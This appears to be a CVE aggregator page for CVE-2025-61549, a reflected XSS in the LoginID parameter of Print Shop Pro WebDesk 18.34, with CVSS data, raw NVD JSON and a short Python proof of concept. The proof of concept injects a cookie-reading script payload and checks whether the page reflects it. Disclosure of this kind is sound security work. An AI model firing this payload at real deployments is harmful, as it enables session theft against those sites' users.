Security Vulnerability Report
中文
CVE-2025-61549 CVSS 6.1 MEDIUM

CVE-2025-61549

Published: 2026-01-08 17:15:49
Last Modified: 2026-02-10 18:16:20
Source: [email protected]

Description

Cross-Site Scripting (XSS) is present on the LoginID parameter on the /PSP/app/web/reg/reg_display.asp endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.76). Unsanitized user input is reflected in HTTP responses without proper HTML encoding or escaping. This allows attackers to execute arbitrary JavaScript in the context of a victim s browser session

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:* - VULNERABLE
Print Shop Pro WebDesk 18.34及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests from urllib.parse import quote # CVE-2025-61549 PoC - Reflected XSS in Print Shop Pro WebDesk # Target URL with vulnerable endpoint base_url = "http://target-server.com" vulnerable_endpoint = "/PSP/app/web/reg/reg_display.asp" # Malicious JavaScript payload for XSS exploit_payload = "<script>alert(document.cookie)</script>" encoded_payload = quote(exploit_payload) # Construct malicious URL malicious_url = f"{base_url}{vulnerable_endpoint}?LoginID={encoded_payload}" print(f"[*] Generating CVE-2025-61549 PoC") print(f"[*] Target: {base_url}") print(f"[*] Vulnerable Endpoint: {vulnerable_endpoint}") print(f"[*] Malicious URL:") print(malicious_url) # Send request to verify vulnerability try: response = requests.get(malicious_url, timeout=10) if encoded_payload in response.text: print("[+] VULNERABLE: Payload reflected without sanitization") else: print("[-] Not vulnerable or payload filtered") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61549", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.830", "lastModified": "2026-02-10T18:16:20.230", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) is present on the LoginID parameter on the /PSP/app/web/reg/reg_display.asp endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.76). Unsanitized user input is reflected in HTTP responses without proper HTML encoding or escaping. This allows attackers to execute arbitrary JavaScript in the context of a victim s browser session"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:*", "matchCriteriaId": "88C72179-FF05-44F1-87A2-80179F38245D"}]}]}], "references": [{"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61549", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61549", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.